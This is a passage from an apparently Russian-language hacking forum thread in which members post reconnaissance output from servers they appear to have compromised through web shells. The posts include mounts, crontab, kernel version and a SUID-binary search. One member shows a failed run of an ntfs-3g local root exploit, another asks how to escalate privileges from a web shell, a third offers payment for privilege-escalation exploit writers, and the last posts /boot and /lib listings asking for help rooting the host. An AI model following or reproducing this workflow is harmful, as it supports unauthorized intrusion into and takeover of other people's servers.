    cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
    cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
    systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
    mqueue on /dev/mqueue type mqueue (rw,relatime)
    debugfs on /sys/kernel/debug type debugfs (rw,relatime)
    hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
    fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
    /dev/sdb1 on /var type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
    /dev/sdc1 on /backup type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
    /dev/sdb1 on /var/www/clients/client2/web7/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
    rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
    /dev/sdb1 on /var/www/clients/client2/web6/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
    /dev/sdb1 on /var/www/clients/client2/web8/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
    binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
    df -h
    Code:
    Filesystem  Size  Used Avail Use% Mounted on
    /dev/sda2  3.0G  1.8G  1.1G  62% /
    udev  10M  0  10M  0% /dev
    tmpfs  403M  41M  362M  11% /run
    tmpfs  1006M  0 1006M  0% /dev/shm
    tmpfs  5.0M  4.0K  5.0M  1% /run/lock
    tmpfs  1006M  0 1006M  0% /sys/fs/cgroup
    /dev/sdb1  99G  40G  54G  43% /var
    /dev/sdc1  99G  359M  93G  1% /backup
    
    Code:
    Debian GNU/Linux 8 \n \l
    
    cat /etc/crontab
    Code:
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user  command
    17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
    25 6  * * *  root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6  * * 7  root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6  1 * *  root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    
    cat /proc/version
    Code:
    Linux version 3.16.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07)
    
    cat /proc/sys/vm/mmap_min_addr
    Code:
    65536
    
    pwd
    Code:
    /var/www/clients/client2/web8/web/modules/crm
    
    ls -la /usr/bin/staprun
    Code:
    ls: cannot access /usr/bin/staprun: No such file or directory
    
    sh-4.3$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    Code:
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    -rwsr-xr-x 1 root root 90456 Aug 13  2014 /sbin/mount.nfs
    -rwsr-xr-x 1 root root 23472 Apr  7 21:58 /usr/sbin/jk_chrootsh
    -rwsr-xr-x 1 root root 13824 Apr  7 21:58 /usr/sbin/jk_procmailwrapper
    -rwsr-xr-- 1 root www-data 18472 Feb 24 20:40 /usr/lib/apache2/suexec-pristine
    -rwsr-xr-x 1 root root 10104 Mar 28 08:33 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root 464904 Jul 22  2016 /usr/lib/openssh/ssh-keysign
    -rwsr-xr-- 1 root messagebus 294512 Nov 22  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 39912 Feb 24 10:09 /usr/bin/newgrp
    -rwsr-sr-x 1 root mail 89248 Feb 11  2015 /usr/bin/procmail
    -rwsr-xr-x 1 root root 54192 Feb 24 10:09 /usr/bin/passwd
    -rwsr-sr-x 1 daemon daemon 55424 Sep 30  2014 /usr/bin/at
    -rwsr-xr-x 1 root root 75376 Feb 24 10:09 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 44464 Feb 24 10:09 /usr/bin/chsh
    -rwsr-xr-x 1 root root 53616 Feb 24 10:09 /usr/bin/chfn
    -rwsr-xr-x 1 root root 157760 Jan 11  2016 /usr/bin/sudo
    -rwsr-xr-x 1 root root 146160 Jan 28 12:16 /bin/ntfs-3g
    -rwsr-xr-x 1 root root 30800 Jan 21  2016 /bin/fusermount
    -rwsr-xr-x 1 root root 40168 Feb 24 10:09 /bin/su
    -rwsr-xr-x 1 root root 27416 Mar 30  2015 /bin/umount
    -rwsr-xr-x 1 root root 40000 Mar 30  2015 /bin/mount
    
    meow MEOW!


    p.s.

    /bin/ntfs-3g
    Code:
    ntfs-3g: No device is specified.
    
    ntfs-3g 2014.2.15AR.2 integrated FUSE 28 - Third Generation NTFS Driver
      Configuration type 7, XATTRS are on, POSIX ACLS are on
    
    Copyright (C) 2005-2007 Yura Pakhuchiy
    Copyright (C) 2006-2009 Szabolcs Szakacsits
    Copyright (C) 2007-2014 Jean-Pierre Andre
    Copyright (C) 2009 Erik Larsson
    
    Usage:  ntfs-3g [-o option[,...]] <device|image_file> <mount_point>
    
    Options:  ro (read-only mount), windows_names, uid=, gid=,
      umask=, fmask=, dmask=, streams_interface=.
      Please see the details in the manual (type: man ntfs-3g).
    
    Example: ntfs-3g /dev/sda1 /mnt/windows
    
    News, support and information:  http://tuxera.com
    
    одняко -> http://0day.today/exploit/26893 ->
    Code:
    sh-4.3$ /bin/bash /tmp/1.sh
    /bin/bash /tmp/1.sh
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @  CVE-2017-0359, PoC by Kristian Erik Hermansen  @
    @  ntfs-3g local privilege escalation to root  @
    @  Credits to Google Project Zero  @
    @  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @
    @  Tested: Debian 9 (Stretch)  @
    @  Date: 2017-02-03  @
    @  Link: https://goo.gl/A9I8Vq  @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    [*] Gathering environment info ...
    [*] Creating kernel hijack directories ...
    mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/lib': Permission denied
    mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/kernel': Permission denied
    [*] Forging symlinks ...
    ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/lib/modules\r/3.16.0-4-amd64\r\r': No such file or directory
    ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/kernel/fs\r/fuse\r': No such file or directory
    ln: failed to create symbolic link 'fuse.ko\r': Permission denied
    [*] Pulling in deps ...
    [*] Building kernel module ...
    /tmp/1.sh: line 25: $'\r': command not found
    /tmp/1.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF')
    : Permission denied cve_2017_0358.c
    
     
  12. Dr_Wile

    Dr_Wile Member

    Joined:
    19 Oct 2016
    Messages:
    121
    Likes Received:
    52
    Reputations:
    2
    Вопрос скорее всего неоднократно задавался, но всё-таки...имея wso Шелл на сайте какие есть способы поднятия прав до рута?
    З.Ы. понимаю что универсального решения нет в этом вопросе, можно на примере объяснить, или подсказать примерный алгоритм
     
  13. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    ебануться. берешь да рутаешь, че.
     
  14. Dr_Wile

    Dr_Wile Member

    Joined:
    19 Oct 2016
    Messages:
    121
    Likes Received:
    52
    Reputations:
    2
    Какой исчерпывающий ответ
     
  15. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    какой вопрос - такой ответ
     
  16. r00t_hack

    r00t_hack New Member

    Joined:
    1 Jul 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    thank you for this service keep up man
     
  17. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    ищу людей кто умеет писать эксплоиты уязвимостей типа буфер оверфлоу с целью повышения привелегий на UNIX подобных ОС. за деньги. ЛС.
     
  18. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    Буду очень благодарен за любую помощь
    • uname -a
    Code:
    Linux p314371.asd.ru 3.10.63-1.el6.elrepo.x86_64 #1 SMP Tue Dec 16 16:52:21 EST 2014 x86_64 x86_64 x86_64 GNU/Linux
    • ls -la /boot
    Code:
    total 145304
    dr-xr-xr-x.  4 root root  4096 Aug 31  2016 .
    dr-xr-xr-x. 22 root root  4096 Feb  3 00:35 ..
    -rw-r--r--  1 root root  171 Jul 25  2014 .vmlinuz-2.6.32-431.20.5.el6.x86_64.hmac
    -rw-r--r--  1 root root  2519609 Jul 25  2014 System.map-2.6.32-431.20.5.el6.x86_64
    -rw-------  1 root root  2926925 Mar 17  2016 System.map-3.10.101-1.el6.elrepo.x86_64
    -rw-------  1 root root  2928277 Aug 29  2016 System.map-3.10.103-1.el6.elrepo.x86_64
    -rw-r--r--  1 root root  2924029 Dec 17  2014 System.map-3.10.63-1.el6.elrepo.x86_64
    -rw-r--r--  1 root root  2925203 Jun  7  2015 System.map-3.10.80-1.el6.elrepo.x86_64
    -rw-r--r--  1 root root  2925063 Sep 22  2015 System.map-3.10.89-1.el6.elrepo.x86_64
    -rw-r--r--  1 root root  105200 Jul 25  2014 config-2.6.32-431.20.5.el6.x86_64
    -rw-r--r--  1 root root  142360 Mar 17  2016 config-3.10.101-1.el6.elrepo.x86_64
    -rw-r--r--  1 root root  142778 Aug 29  2016 config-3.10.103-1.el6.elrepo.x86_64
    -rw-r--r--  1 root root  142373 Dec 17  2014 config-3.10.63-1.el6.elrepo.x86_64
    -rw-r--r--  1 root root  142381 Jun  7  2015 config-3.10.80-1.el6.elrepo.x86_64
    -rw-r--r--  1 root root  142381 Sep 22  2015 config-3.10.89-1.el6.elrepo.x86_64
    drwxr-xr-x.  3 root root  4096 Sep 28  2012 efi
    drwxr-xr-x.  2 root root  4096 Aug 31  2016 grub
    -rw-------.  1 root root 14203374 Aug  4  2014 initramfs-2.6.32-431.20.5.el6.x86_64.img
    -rw-------  1 root root 17405311 Apr  5  2016 initramfs-3.10.101-1.el6.elrepo.x86_64.img
    -rw-------  1 root root 17424573 Aug 31  2016 initramfs-3.10.103-1.el6.elrepo.x86_64.img
    -rw-------  1 root root 17083963 Dec 22  2014 initramfs-3.10.63-1.el6.elrepo.x86_64.img
    -rw-------  1 root root 17361940 Jun  9  2015 initramfs-3.10.80-1.el6.elrepo.x86_64.img
    -rw-------  1 root root 17368226 Sep 24  2015 initramfs-3.10.89-1.el6.elrepo.x86_64.img
    -rw-r--r--  1 root root  193901 Jul 25  2014 symvers-2.6.32-431.20.5.el6.x86_64.gz
    -rw-r--r--  1 root root  258324 Mar 17  2016 symvers-3.10.101-1.el6.elrepo.x86_64.gz
    -rw-r--r--  1 root root  258396 Aug 29  2016 symvers-3.10.103-1.el6.elrepo.x86_64.gz
    -rw-r--r--  1 root root  258276 Dec 17  2014 symvers-3.10.63-1.el6.elrepo.x86_64.gz
    -rw-r--r--  1 root root  258289 Jun  7  2015 symvers-3.10.80-1.el6.elrepo.x86_64.gz
    -rw-r--r--  1 root root  258410 Sep 22  2015 symvers-3.10.89-1.el6.elrepo.x86_64.gz
    -rwxr-xr-x  1 root root  4131440 Jul 25  2014 vmlinuz-2.6.32-431.20.5.el6.x86_64
    -rwxr-xr-x  1 root root  4860304 Mar 17  2016 vmlinuz-3.10.101-1.el6.elrepo.x86_64
    -rwxr-xr-x  1 root root  4865264 Aug 29  2016 vmlinuz-3.10.103-1.el6.elrepo.x86_64
    -rwxr-xr-x  1 root root  4846192 Dec 17  2014 vmlinuz-3.10.63-1.el6.elrepo.x86_64
    -rwxr-xr-x  1 root root  4852592 Jun  7  2015 vmlinuz-3.10.80-1.el6.elrepo.x86_64
    -rwxr-xr-x  1 root root  4852592 Sep 22  2015 vmlinuz-3.10.89-1.el6.elrepo.x86_64
    • ls -la --full-time /lib

    Code:
    total 3796
    dr-xr-xr-x. 10 root root  4096 2017-01-20 13:27:07.905172467 +0300 .
    dr-xr-xr-x. 22 root root  4096 2017-02-03 00:35:44.699000000 +0300 ..
    lrwxrwxrwx  1 root root  14 2016-08-31 11:54:58.256945288 +0300 cpp -> ../usr/bin/cpp
    drwxr-xr-x. 45 root root  12288 2017-01-20 13:27:06.925187250 +0300 firmware
    drwxr-xr-x  3 root root  4096 2016-05-10 16:16:57.000000000 +0300 i686
    drwxr-xr-x.  6 root root  4096 2012-09-28 12:27:51.000000000 +0400 kbd
    -rwxr-xr-x  1 root root  145272 2016-05-10 16:45:52.000000000 +0300 ld-2.12.so
    lrwxrwxrwx  1 root root  10 2016-08-31 16:20:47.370693128 +0300 ld-linux.so.2 -> ld-2.12.so
    -rwxr-xr-x  1 root root  7224 2016-05-10 16:45:54.000000000 +0300 libBrokenLocale-2.12.so
    lrwxrwxrwx  1 root root  23 2016-08-31 16:20:47.372693095 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
    -rwxr-xr-x  1 root root  20376 2016-05-10 16:45:54.000000000 +0300 libSegFault.so
    -rwxr-xr-x  1 root root  13416 2016-05-10 16:45:54.000000000 +0300 libanl-2.12.so
    lrwxrwxrwx  1 root root  14 2016-08-31 16:20:47.375693044 +0300 libanl.so.1 -> libanl-2.12.so
    -rwxr-xr-x  1 root root 1908112 2016-05-10 16:45:55.000000000 +0300 libc-2.12.so
    lrwxrwxrwx  1 root root  12 2016-08-31 16:20:47.490691114 +0300 libc.so.6 -> libc-2.12.so
    -rwxr-xr-x  1 root root  190992 2016-05-10 16:45:53.000000000 +0300 libcidn-2.12.so
    lrwxrwxrwx  1 root root  15 2016-08-31 16:20:47.500690946 +0300 libcidn.so.1 -> libcidn-2.12.so
    -rwxr-xr-x  1 root root  38380 2016-05-10 16:45:53.000000000 +0300 libcrypt-2.12.so
    lrwxrwxrwx  1 root root  16 2016-08-31 16:20:47.506690845 +0300 libcrypt.so.1 -> libcrypt-2.12.so
    -rwxr-xr-x  1 root root  17896 2016-05-10 16:45:52.000000000 +0300 libdl-2.12.so
    lrwxrwxrwx  1 root root  13 2016-08-31 16:20:47.507690829 +0300 libdl.so.2 -> libdl-2.12.so
    lrwxrwxrwx  1 root root  17 2017-01-20 13:27:07.896172603 +0300 libexpat.so.1 -> libexpat.so.1.5.2
    -rwxr-xr-x  1 root root  160956 2016-11-29 01:18:51.000000000 +0300 libexpat.so.1.5.2
    -rw-r--r--  1 root root  899 2016-07-12 18:29:13.000000000 +0300 libfreebl3.chk
    -rwxr-xr-x  1 root root  9604 2016-07-12 18:29:13.000000000 +0300 libfreebl3.so
    -rw-r--r--  1 root root  899 2016-07-12 18:29:13.000000000 +0300 libfreeblpriv3.chk
    -rwxr-xr-x  1 root root  378504 2016-07-12 18:29:13.000000000 +0300 libfreeblpriv3.so
    -rwxr-xr-x  1 root root  200092 2016-05-10 16:45:54.000000000 +0300 libm-2.12.so
    lrwxrwxrwx  1 root root  12 2016-08-31 16:20:47.519690627 +0300 libm.so.6 -> libm-2.12.so
    -rwxr-xr-x  1 root root  113912 2016-05-10 16:45:55.000000000 +0300 libnsl-2.12.so
    lrwxrwxrwx  1 root root  14 2016-08-31 16:20:47.525690527 +0300 libnsl.so.1 -> libnsl-2.12.so
    -rwxr-xr-x  1 root root  40200 2016-05-10 16:45:54.000000000 +0300 libnss_compat-2.12.so
    lrwxrwxrwx  1 root root  21 2016-08-31 16:20:47.528690476 +0300 libnss_compat.so.2 -> libnss_compat-2.12.so
    -rwxr-xr-x  1 root root  25596 2016-05-10 16:45:54.000000000 +0300 libnss_dns-2.12.so
    lrwxrwxrwx  1 root root  18 2016-08-31 16:20:47.530690443 +0300 libnss_dns.so.2 -> libnss_dns-2.12.so
    -rwxr-xr-x  1 root root  58728 2016-05-10 16:45:53.000000000 +0300 libnss_files-2.12.so
    lrwxrwxrwx  1 root root  20 2016-08-31 16:20:47.533690392 +0300 libnss_files.so.2 -> libnss_files-2.12.so
    -rwxr-xr-x  1 root root  22140 2016-05-10 16:45:53.000000000 +0300 libnss_hesiod-2.12.so
    lrwxrwxrwx  1 root root  21 2016-08-31 16:20:47.534690375 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
    -rwxr-xr-x  1 root root  49712 2016-05-10 16:45:53.000000000 +0300 libnss_nis-2.12.so
    lrwxrwxrwx  1 root root  18 2016-08-31 16:20:47.537690325 +0300 libnss_nis.so.2 -> libnss_nis-2.12.so
    -rwxr-xr-x  1 root root  58712 2016-05-10 16:45:53.000000000 +0300 libnss_nisplus-2.12.so
    lrwxrwxrwx  1 root root  22 2016-08-31 16:20:47.540690275 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
    -rwxr-xr-x  1 root root  131260 2016-05-10 16:45:55.000000000 +0300 libpthread-2.12.so
    lrwxrwxrwx  1 root root  18 2016-08-31 16:20:47.547690157 +0300 libpthread.so.0 -> libpthread-2.12.so
    -rwxr-xr-x  1 root root  103388 2016-05-10 16:45:54.000000000 +0300 libresolv-2.12.so
    lrwxrwxrwx  1 root root  17 2016-08-31 16:20:47.555690023 +0300 libresolv.so.2 -> libresolv-2.12.so
    -rwxr-xr-x  1 root root  39764 2016-05-10 16:45:53.000000000 +0300 librt-2.12.so
    lrwxrwxrwx  1 root root  13 2016-08-31 16:20:47.558689973 +0300 librt.so.1 -> librt-2.12.so
    -rwxr-xr-x  1 root root  31620 2016-05-10 16:45:54.000000000 +0300 libthread_db-1.0.so
    lrwxrwxrwx  1 root root  19 2016-08-31 16:20:47.560689939 +0300 libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x  1 root root  12792 2016-05-10 16:45:52.000000000 +0300 libutil-2.12.so
    lrwxrwxrwx  1 root root  15 2016-08-31 16:20:47.561689922 +0300 libutil.so.1 -> libutil-2.12.so
    dr-xr-xr-x.  8 root root  4096 2016-08-31 16:20:56.362542218 +0300 modules
    drwxr-xr-x  3 root root  4096 2016-08-31 16:20:47.565689855 +0300 rtkaio
    drwxr-xr-x.  2 root root  4096 2016-05-11 02:18:18.000000000 +0300 security
    drwxr-xr-x.  6 root root  4096 2015-03-16 11:53:51.000000000 +0300 terminfo
    drwxr-xr-x.  5 root root  4096 2016-09-14 15:20:27.466794682 +0300 udev
    • ls -la --full-time /lib64
    Code:
    total 16640
    dr-xr-xr-x.  8 root root  12288 2017-01-20 13:27:07.373180492 +0300 .
    dr-xr-xr-x. 22 root root  4096 2017-02-03 00:35:44.699000000 +0300 ..
    -rw-r--r--.  1 root root  65 2011-12-07 23:13:53.000000000 +0400 .libfipscheck.so.1.1.0.hmac
    lrwxrwxrwx.  1 root root  27 2012-09-28 12:27:44.000000000 +0400 .libfipscheck.so.1.hmac -> .libfipscheck.so.1.1.0.hmac
    -rw-r--r--  1 root root  65 2016-11-11 22:42:09.000000000 +0300 .libgcrypt.so.11.hmac
    drwxr-xr-x  2 root root  4096 2016-04-05 14:18:15.198119825 +0300 dbus-1
    -rwxr-xr-x  1 root root  154664 2016-05-10 17:11:19.000000000 +0300 ld-2.12.so
    lrwxrwxrwx  1 root root  10 2016-08-31 16:19:30.983976451 +0300 ld-linux-x86-64.so.2 -> ld-2.12.so
    -rwxr-xr-x  1 root root  8488 2016-05-10 17:11:21.000000000 +0300 libBrokenLocale-2.12.so
    lrwxrwxrwx  1 root root  23 2016-08-31 16:19:30.984976434 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
    -rwxr-xr-x  1 root root  21928 2016-05-10 17:11:20.000000000 +0300 libSegFault.so
    lrwxrwxrwx.  1 root root  15 2012-09-28 12:27:28.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
    -rwxr-xr-x.  1 root root  31280 2011-12-07 20:53:53.000000000 +0400 libacl.so.1.1.0
    lrwxrwxrwx  1 root root  22 2014-06-17 13:19:37.000000000 +0400 libaio.so.1 -> /lib64/libaio.so.1.0.1
    -rwxr-xr-x  1 root root  3944 2010-08-23 01:08:18.000000000 +0400 libaio.so.1.0.0
    -rwxr-xr-x  1 root root  3944 2010-08-23 01:08:18.000000000 +0400 libaio.so.1.0.1
    -rwxr-xr-x  1 root root  19368 2016-05-10 17:11:20.000000000 +0300 libanl-2.12.so
    lrwxrwxrwx  1 root root  14 2016-08-31 16:19:30.987976384 +0300 libanl.so.1 -> libanl-2.12.so
    lrwxrwxrwx  1 root root  18 2016-08-31 16:20:38.350844541 +0300 libasound.so.2 -> libasound.so.2.0.0
    -rwxr-xr-x  1 root root  983440 2016-05-11 10:09:48.000000000 +0300 libasound.so.2.0.0
    lrwxrwxrwx.  1 root root  16 2012-09-28 12:27:28.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
    -rwxr-xr-x.  1 root root  18712 2011-09-23 22:53:58.000000000 +0400 libattr.so.1.1.0
    lrwxrwxrwx  1 root root  17 2016-08-31 16:19:35.909893622 +0300 libaudit.so.1 -> libaudit.so.1.0.0
    -rwxr-xr-x  1 root root  145864 2016-05-11 09:17:06.000000000 +0300 libaudit.so.1.0.0
    lrwxrwxrwx  1 root root  19 2016-08-31 16:19:35.920893437 +0300 libauparse.so.0 -> libauparse.so.0.0.0
    -rwxr-xr-x  1 root root  88672 2016-05-11 09:17:06.000000000 +0300 libauparse.so.0.0.0
    lrwxrwxrwx  1 root root  17 2017-01-20 13:26:14.641975855 +0300 libblkid.so.1 -> libblkid.so.1.1.0
    -rwxr-xr-x  1 root root  136136 2016-11-18 18:38:31.000000000 +0300 libblkid.so.1.1.0
    lrwxrwxrwx.  1 root root  15 2012-09-28 12:27:29.000000000 +0400 libbz2.so.1 -> libbz2.so.1.0.4
    -rwxr-xr-x.  1 root root  67592 2011-06-25 05:45:55.000000000 +0400 libbz2.so.1.0.4
    -rwxr-xr-x  1 root root 1923352 2016-05-10 17:11:22.000000000 +0300 libc-2.12.so
    lrwxrwxrwx  1 root root  12 2016-08-31 16:19:31.087974702 +0300 libc.so.6 -> libc-2.12.so
    lrwxrwxrwx.  1 root root  18 2012-09-28 12:27:42.000000000 +0400 libcap-ng.so.0 -> libcap-ng.so.0.0.0
    -rwxr-xr-x.  1 root root  18672 2011-06-25 07:49:32.000000000 +0400 libcap-ng.so.0.0.0
    lrwxrwxrwx.  1 root root  14 2012-09-28 12:27:28.000000000 +0400 libcap.so.2 -> libcap.so.2.16
    -rwxr-xr-x.  1 root root  16600 2011-12-08 00:04:01.000000000 +0400 libcap.so.2.16
    lrwxrwxrwx  1 root root  19 2016-09-01 13:31:20.935441246 +0300 libcgroup.so.1 -> libcgroup.so.1.0.40
    -rwxr-xr-x  1 root root  100488 2016-07-12 19:27:19.000000000 +0300 libcgroup.so.1.0.40
    -rwxr-xr-x  1 root root  197064 2016-05-10 17:11:19.000000000 +0300 libcidn-2.12.so
    lrwxrwxrwx  1 root root  15 2016-08-31 16:19:31.096974551 +0300 libcidn.so.1 -> libcidn-2.12.so
    lrwxrwxrwx  1 root root  17 2015-09-24 13:39:12.714000000 +0300 libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x  1 root root  14664 2015-07-24 13:33:24.000000000 +0300 libcom_err.so.2.1
    -rwxr-xr-x  1 root root  40400 2016-05-10 17:11:20.000000000 +0300 libcrypt-2.12.so
    lrwxrwxrwx  1 root root  16 2016-08-31 16:19:31.099974500 +0300 libcrypt.so.1 -> libcrypt-2.12.so
    -rwxr-xr-x  1 root root 1525560 2017-01-11 21:40:04.000000000 +0300 libdb-4.7.so
    lrwxrwxrwx  1 root root  18 2015-06-09 15:16:04.212000000 +0300 libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x  1 root root  265728 2015-04-22 13:52:25.000000000 +0300 libdbus-1.so.3.4.0
    -rwxr-xr-x  1 root root  19536 2016-05-10 17:11:19.000000000 +0300 libdl-2.12.so
    lrwxrwxrwx  1 root root  13 2016-08-31 16:19:31.100974484 +0300 libdl.so.2 -> libdl-2.12.so
    lrwxrwxrwx  1 root root  13 2015-09-24 13:39:23.481000000 +0300 libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x  1 root root  28120 2015-07-24 13:33:24.000000000 +0300 libe2p.so.2.3
    lrwxrwxrwx  1 root root  17 2017-01-20 13:26:13.981985808 +0300 libexpat.so.1 -> libexpat.so.1.5.2
    -rwxr-xr-x  1 root root  165040 2016-11-29 01:21:21.000000000 +0300 libexpat.so.1.5.2
    lrwxrwxrwx  1 root root  16 2015-09-24 13:39:23.486000000 +0300 libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x  1 root root  201784 2015-07-24 13:33:24.000000000 +0300 libext2fs.so.2.4
    lrwxrwxrwx.  1 root root  21 2012-09-28 12:27:44.000000000 +0400 libfipscheck.so.1 -> libfipscheck.so.1.1.0
    -rwxr-xr-x.  1 root root  10288 2011-12-07 23:13:53.000000000 +0400 libfipscheck.so.1.1.0
    -rw-r--r--  1 root root  899 2016-07-12 18:35:41.000000000 +0300 libfreebl3.chk
    -rwxr-xr-x  1 root root  10312 2016-07-12 18:35:41.000000000 +0300 libfreebl3.so
    -rw-r--r--  1 root root  899 2016-07-12 18:35:41.000000000 +0300 libfreeblpriv3.chk
    -rwxr-xr-x  1 root root  477712 2016-07-12 18:35:41.000000000 +0300 libfreeblpriv3.so
    -rwxr-xr-x  1 root root  90880 2016-05-10 12:38:12.000000000 +0300 libgcc_s-4.4.7-20120601.so.1
    lrwxrwxrwx  1 root root  28 2016-08-31 11:54:57.160963302 +0300 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1
    lrwxrwxrwx  1 root root  19 2017-01-20 13:27:07.344180930 +0300 libgcrypt.so.11 -> libgcrypt.so.11.5.3
    -rwxr-xr-x  1 root root  478496 2016-11-11 22:42:09.000000000 +0300 libgcrypt.so.11.5.3
    lrwxrwxrwx  1 root root  22 2016-08-31 16:19:35.985892344 +0300 libgio-2.0.so.0 -> libgio-2.0.so.0.2800.8
    -rwxr-xr-x  1 root root 1148296 2016-05-11 01:41:53.000000000 +0300 libgio-2.0.so.0.2800.8
    lrwxrwxrwx  1 root root  23 2016-08-31 16:19:36.050891252 +0300 libglib-2.0.so.0 -> libglib-2.0.so.0.2800.8
    -rwxr-xr-x  1 root root 1140496 2016-05-11 01:41:53.000000000 +0300 libglib-2.0.so.0.2800.8
    lrwxrwxrwx  1 root root  26 2016-08-31 16:19:36.122890041 +0300 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.2800.8
    -rwxr-xr-x  1 root root  11832 2016-05-11 01:41:53.000000000 +0300 libgmodule-2.0.so.0.2800.8
    lrwxrwxrwx  1 root root  26 2016-08-31 16:19:36.126889974 +0300 libgobject-2.0.so.0 -> libgobject-2.0.so.0.2800.8
    -rwxr-xr-x  1 root root  308848 2016-05-11 01:41:53.000000000 +0300 libgobject-2.0.so.0.2800.8
    lrwxrwxrwx.  1 root root  21 2012-09-28 12:27:31.000000000 +0400 libgpg-error.so.0 -> libgpg-error.so.0.5.0
    -rwxr-xr-x.  1 root root  14288 2011-12-07 21:37:21.000000000 +0400 libgpg-error.so.0.5.0
    lrwxrwxrwx  1 root root  21 2016-08-31 16:19:35.584899087 +0300 libgssapi_krb5.so.2 -> libgssapi_krb5.so.2.2
    -rwxr-xr-x  1 root root  277704 2016-05-11 01:56:56.000000000 +0300 libgssapi_krb5.so.2.2
    lrwxrwxrwx  1 root root  16 2016-08-31 16:19:35.611898633 +0300 libgssrpc.so.4 -> libgssrpc.so.4.1
    -rwxr-xr-x  1 root root  131384 2016-05-11 01:56:56.000000000 +0300 libgssrpc.so.4.1
    lrwxrwxrwx  1 root root  26 2016-08-31 16:19:36.146889637 +0300 libgthread-2.0.so.0 -> libgthread-2.0.so.0.2800.8
    -rwxr-xr-x  1 root root  17536 2016-05-11 01:41:53.000000000 +0300 libgthread-2.0.so.0.2800.8
    lrwxrwxrwx.  1 root root  16 2012-09-28 12:27:31.000000000 +0400 libidn.so.11 -> libidn.so.11.6.1
    -rwxr-xr-x.  1 root root  206672 2010-08-24 04:51:20.000000000 +0400 libidn.so.11.6.1
    lrwxrwxrwx  1 root root  34 2015-09-24 13:44:32.109000000 +0300 libip4tc.so.0 -> /etc/alternatives/libip4tc0.x86_64
    lrwxrwxrwx  1 root root  23 2015-09-24 13:40:38.566000000 +0300 libip4tc.so.0-1.4.7 -> libip4tc.so.0.0.0-1.4.7
    lrwxrwxrwx  1 root root  36 2015-09-24 13:44:32.109000000 +0300 libip4tc.so.0.0.0 -> /etc/alternatives/libip4tc000.x86_64
    -rwxr-xr-x  1 root root  26360 2015-07-24 05:10:22.000000000 +0300 libip4tc.so.0.0.0-1.4.7
    lrwxrwxrwx  1 root root  34 2015-09-24 13:44:32.109000000 +0300 libip6tc.so.0 -> /etc/alternatives/libip6tc0.x86_64
    lrwxrwxrwx  1 root root  23 2015-09-24 13:40:38.568000000 +0300 libip6tc.so.0-1.4.7 -> libip6tc.so.0.0.0-1.4.7
